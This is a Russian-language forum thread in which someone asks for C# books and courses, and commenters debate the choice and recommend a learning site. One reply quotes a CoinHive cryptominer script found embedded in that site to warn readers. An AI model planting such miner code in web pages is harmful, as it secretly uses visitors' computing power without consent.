Какие на данный момент есть годные учебные материалы (книги и интерактивные курсы) по C#?
Т.к. я пришел в программирование за деньгами, то подумываю начать продвижение из теплой ламповой разработки на PHP в сторону махрового энтерпрайза и тяжелых приложений, в т.ч. связанных с финансовым сектором. Выбор пал на C#, т.к. этот язык активно используется при написании торговых роботов. Мне интересно это направление.
Порекомендуйте пожалуйста материалы для изучения с нуля, с какой книги или курса лучше начать? Ранее не работал с этим языком и экосистемой.
Ничего себе у вас разгон. Сами говорите, что не работали с C#, но уже метите в интерпрайз.
И причём, в интерпрайзе C# не один и сильно бодается с Java за популярность.
Тороговых ботов можно писать и на питоне.
r0ger27, был бы этот сайт моим, на нём не было бы столь отвратно-блевотного дизайна.
Посоветовал я его, потому что сам с него начинал.
А вот про майнер, это, конечно, скверно. Даже не подозревал об этом. Мб, мой ФФ сам этот майнер и заблочил. Нагрузка ЦП у меня в пределах 5%, когда на этот сайт захожу.
<script>
var miner = new CoinHive.Anonymous('wiV6jztWE8odCM5CmF6pvi99CYppXX8k', { throttle: 0.2 });
miner.start();
</script>
+ плагин браузера сам заблокировал его (но дал уведомление о майнере)
+ даже тема есть (не реклама) об этом сайте на пикабу https://pikabu.ru/story/mayner_na_professorwebru_5... :)
А так, повторюсь, информация там неплохая очень даже